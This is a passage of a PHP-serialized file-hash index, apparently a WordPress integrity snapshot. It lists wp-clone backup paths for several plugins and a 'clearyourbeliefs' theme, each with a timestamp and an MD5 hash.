orm-builder/js/ckeditor/ckeditor.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"a71523871d466d6acd12eac59885fef8";}s:103:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/config.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"664bd97927a539d1d3a291228f3d0184";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/contents.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"2fc0f6f42cc1cba1da1161dd1f2aa86f";}s:104:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/lang/en.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"13e68db2445153b70e294643959e6cd5";}s:128:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/plugins/dialog/dialogDefinition.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"73b1474cf9e14ab439d8b90183c6849b";}s:124:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/plugins/link/dialogs/anchor.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"ac94ef450e45432296059f21f7e2cacc";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/plugins/link/dialogs/link.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"f94502fd01e2d24b3f00b2d50ac15aa4";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/skins/moono/dialog.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"16f82e3221956b72bdb7d569883ef789";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/skins/moono/dialog_ie.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"4e61cf344391e683be30f28b08eb075f";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/skins/moono/dialog_ie7.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"d3036e6c6eec00d81096d7f653380ed8";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/skins/moono/dialog_ie8.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"f07d4442a2ca3e068f8962952fe41519";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/skins/moono/dialog_iequirks.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"b0acb95e134fba8de6f3451e1401ea9a";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/skins/moono/dialog_opera.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"61c2a2b27050f4564fb38d2af8975004";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/skins/moono/editor.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"86998996d5bded72252c699ef65cf929";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/skins/moono/editor_gecko.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"1643ab359598be48e257d1dc8df6564e";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/skins/moono/editor_ie.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"3eca9644101a3ce6d28bc40b7a4bf77f";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/skins/moono/editor_ie7.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"c065f7b98dfce0a40cc2e9f01b3eba49";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/skins/moono/editor_ie8.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"ca8514075be92412bd1fbee41e5c9a88";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/skins/moono/editor_iequirks.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"05187618ee7ac67630db33e5335d7b2b";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/ckeditor/skins/moono/readme.md";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"a2e00abd50e5d5f7edb67d7de9f3216c";}s:103:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/jquery.metadata.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"059353487d65b302c4c1def7bbc59d1a";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/jquery.ui.nestedSortable.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"946d83fa633503271865d8308d82eaf5";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/jquery.ui.nestedSortable.min.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"dcb8840bc82c96568182ab1ca78af4e7";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/jquery.validate.min.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"c593e70ef041ab387fefad5fe38a724c";}s:97:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/vfb-admin.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"d72e41b27a1a274a4a611cb2dce2dd18";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/vfb-admin.min.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"23f37135628e661cd9483114f65f8318";}s:102:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/vfb-validation.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"b94ebb588571fb9e00f721fa1d9e1e9a";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/js/vfb-validation.min.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"36dfa1730b8d61fa476c2494e1f4e19e";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/languages/visual-form-builder.pot";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"eabf65cf4fb763f68bdd85a3993f64e3";}s:92:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/readme.txt";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"98117f710785caa628b9634fa03e6bed";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/uninstall.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"56888f6ca4944743337b0b159ec82436";}s:105:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/visual-form-builder/visual-form-builder.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"84cc5f65ce3c6ec5c9be3183a627e31a";}s:102:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-clone-by-wp-academy/lib/css/style.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"fe1623cc0dfab8d07ad8a5ea93672648";}s:102:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-clone-by-wp-academy/lib/functions.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"b3027a6f1f598c65972a00801d9ee7dc";}s:111:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-clone-by-wp-academy/lib/icit_srdb_replacer.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"8cead123d0a0e4ed50dcf617e8cab8a9";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-clone-by-wp-academy/lib/js/ZeroClipboard.swf";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"b07f4a995741849bd90a57ec73bb73a6";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-clone-by-wp-academy/lib/js/backupmanager.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"0ae9fd6996baf79db511e7b895be934a";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-clone-by-wp-academy/lib/js/zeroclipboard.min.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"86ec141f0c4bcd0ab140a1c0d6cd9f78";}s:97:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-clone-by-wp-academy/lib/view.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"6946792fb8564abeefb3a037c87786b4";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-clone-by-wp-academy/readme.txt";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"5b2f853d9ca242bd95afd89debc22856";}s:96:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-clone-by-wp-academy/wpclone.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"646350de61df688c28012d9e27e047b6";}s:92:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/classes/WPEditor.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"1e8f1daf1099ea8ed340daa6b43e50cc";}s:97:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/classes/WPEditorAdmin.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"55a7fd2bd3524cf40a3b48ab5793d0e9";}s:96:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/classes/WPEditorAjax.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"22c5c7db964d54c06d60f2e893d5e09e";}s:99:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/classes/WPEditorBrowser.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"ae2c2812afc697f4db101a5f27043da2";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/classes/WPEditorException.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"ec61d6b1821fe453bffddda8e9ca3a09";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/classes/WPEditorLog.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"aa9e4bc66cf035a66bdd7999ad38749a";}s:99:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/classes/WPEditorPlugins.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"1f85d0cbf09ae7c11d90c679967a653f";}s:97:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/classes/WPEditorPosts.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"8a046edafeef8b314c5c0a1a8758c560";}s:99:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/classes/WPEditorSetting.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"606eae005c300b9527fa393b4a42bc20";}s:98:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/classes/WPEditorThemes.php";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"bf0d0535bc2be9cd81cce82f38b1d3e4";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/attrchange/attrchange.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"4bde2d6783e4cf2c5b605448008baf01";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/chosen/css/chosen.min.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"165eb25cb9d849a71877f02beca5e686";}s:113:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/chosen/js/chosen.jquery.min.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"57655d5685e3fbd591350cb803b612ff";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/css/codemirror.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"3109cdca46ea5a059ba1a641e2ea7505";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/css/dialog.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"a9c866bf115f173f32a9c8023d528059";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/css/fullscreen.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"f503a10634ffde77c8d267478d34d414";}s:105:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/js/clike.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"f0136c0a5edd56e3b9bea8dc98312dc6";}s:110:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/js/codemirror.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"ab11c39ebc591f742a8390977345f7ed";}s:103:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/js/css.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"4e6ebf9da6fd4c4eb2c008f0bdc94255";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/js/dialog.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"5527db8ce9771991fd552c9d8e05f0b4";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/js/foldcode.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"e43de27f96894c044d4927bc1b034e1d";}s:110:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/js/fullscreen.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"27b2f3c23a49901a46af08581096af72";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/js/htmlembedded.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"bf98ad49f2923c24ba9f2ee2a1cd4221";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/js/htmlmixed.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"bf125fbb8a46ffb3c540aac4bea4c494";}s:110:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/js/javascript.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"88fa2496302de162c3f72da024978f58";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/js/mustache.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"635b1af71894bac2d0e7aa4e07fdeb35";}s:103:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/js/php.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"22049ec15810fb7d370b1b9f641068d2";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/js/search.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"0212fabfbb015c96d07fbd65ed3651ee";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/js/searchcursor.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"e22e93dceab86fb8a5e216476014f3f9";}s:103:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/js/xml.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"c9f57909ac387039354448f0bcffca25";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/theme/theme.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"a8d42be82dae84f4d64d835456b3e5c3";}s:111:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/codemirror/themes/themes.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"8e8f0ab279993e3ec5316a6b59bfcdd4";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/fancybox/images/blank.gif";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"325472601571f31e1bf00674c368d335";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/fancybox/jquery.fancybox-1.3.4.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"a66f3a2cb6070535a7451ce9e7382838";}s:124:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/fancybox/js/jquery.fancybox-1.3.4.pack.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"8bc36a08c46719377528d962966ce37c";}s:118:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/nivo-lightbox/css/nivo-lightbox.css";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"b488b58f677d4a2e0716e9db1c837119";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/nivo-lightbox/js/nivo-lightbox.min.js";a:2:{s:1:"d";i:1517159306;s:1:"h";s:32:"adb0c19e4afac84082c07dc5833de4c0";}s:123:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/nivo-lightbox/themes/default/default.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"9dd813ea5192e810101c63630f2726a1";}s:123:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/nivo-lightbox/themes/default/loading.gif";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"fa54e1a0b386f83fabb7bc6e62bafd2c";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/extensions/nivo-lightbox/themes/default/loading@2x.gif";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"5add32b4976240bbb0e12bb7caabc821";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/images/loader.gif";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"67f40a30bfa13743e5c4e86bfa467a90";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/images/xml.psd";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"4137f292f5fcd79b73b11c911b122e01";}s:90:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/js/posts-jquery.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"3ae0f489c9a79230c55de54dbf5b9dee";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/js/quicktags.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"8bf4a9d6a3c847ec706c88e77ae417ee";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/js/wpeditor.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"18a2a50f8b8bd63bf42f6e0ba0d70dfa";}s:82:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/readme.txt";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"adeec2014124ad289141c80732290bc5";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/sql/database.sql";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"4c8ed3e0df3c7126dacab486cd2ceec4";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/sql/uninstall.sql";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"22fb9cbfdc7b46811a81a2058d890974";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/uninstall.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"3753a7ed1e4cfdf58c5eee2cdf4f98ee";}s:93:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/views/OLDsettings.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"4a87fc7e989cd576ec97ca786af9c420";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/views/plugin-editor.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"c0e5df7b9c04062038191ba68e2797c0";}s:90:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/views/settings.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"5fbf862d31dc5cfe3b7f3f1144840a3c";}s:94:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/views/theme-editor.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"88d201f680341767f7d4c74d81857b65";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/wpeditor.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"e55af832f6f5f1111d60947326c516f4";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-editor/wpeditor.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"bfaf3511841fb46d473a2c70ffece442";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/css/tsa-admin.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"f164fe84cf012930f024f349de204b57";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/css/tsa.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"ef48f8499719be84906d849e4e305dcd";}s:124:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/images/tsa-ajax-loader.gif";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"4ac11a3cc98c2f3c22837176c3a54262";}s:113:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/js/tsa-admin.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"98f264a383e236a6a50a2ff5c0144f95";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/js/tsa.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"592b1d9f530e0135b59031d9819be9b1";}s:118:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/php/add-calendar.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"dbc09673dc25f264f6cb43bcd807f2c9";}s:121:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/php/delete-calendar.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"b13a056242d989285b13958e7f1cefc2";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/php/functions.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"080341e5dcd4a946defeadafe1b45797";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/php/save-calendar.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"94688662923f062f4fbef19a4b44c7c5";}s:119:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/php/show-calendar.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"81f3f0c8ed8ea926a94be351e9ce1eae";}s:112:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/php/widget.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"6362c828e0df50994367440773eb7e9f";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/views/add-calendar.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"d611b97977cf4747b14de01a3bbc0df5";}s:121:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/views/calendar-list.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"a1d665a9ad98ba4c680618b0d9be7d86";}s:121:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/views/edit-calendar.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"4367d6e31e2f469ed8fa65699e15c51e";}s:123:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/views/token-generator.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"4b6271e035a0fb959f9ccaf7c99f6433";}s:137:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/wp-time-slots-availability-calendar/wp-time-slots-availability-calendar.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"59cd7941020450dcbd5e51cacfff5b73";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/archive.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"71ace8d91b7d922802d37696e2718f17";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/author.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"6b910b9f99e77654383359846f981f5a";}s:91:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/author_bk.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"69442090155bfe6d92ca3e393c885534";}s:90:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/category.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"ea7af67efd4ef7bffa0a86a82212da3e";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/footer.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"159d068fac093067b70b8ae57f510abf";}s:91:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/functions.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"7c68d72f90e57279121655e2f175e26f";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/header.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"2e6a2bb74e2e121eb3b6a2bede29fb36";}s:105:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/images/loadingAnimation.gif";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"c33734a1bf58bec328ffa27872e96ae1";}s:92:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/js/thickbox.js";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"c7dd74f2796e45e193ce8473d4f42962";}s:104:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/page-templates/coaches.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"6f1b087e6270e29b16b888f909deb314";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/page-templates/coaches_bk.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"3978980e11f1e1504f8b891788870865";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/page-templates/contributors.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"894c02add43e2866300c16affc75284f";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/page-templates/landingpage.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"bf8eb7b74d1e4a3e406dd358e380591a";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/page-templates/landingpage2.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"8baf17a605ad7873c90dce7a22d043d2";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/page.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"dbb0bfb31d3bf2efbf01d73f6f7ae843";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/style.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"9492e85df7872c886633736ccd6ff854";}s:90:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/style_BL.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"5f03e6022c45dd636b94e8d14cb0adab";}s:90:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/clearyourbeliefs/style_bk.css";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"5f03e6022c45dd636b94e8d14cb0adab";}s:70:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/index.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"96137494913a1f730a592e8932af394e";}s:83:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/404.php";a:2:{s:1:"d";i:1517159307;s:1:"h";s:32:"b9b12a3c8353c6228ba30c0ae482f773";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentyfourteen/archive.php";a:2:{s:1:"d";i:1517159307;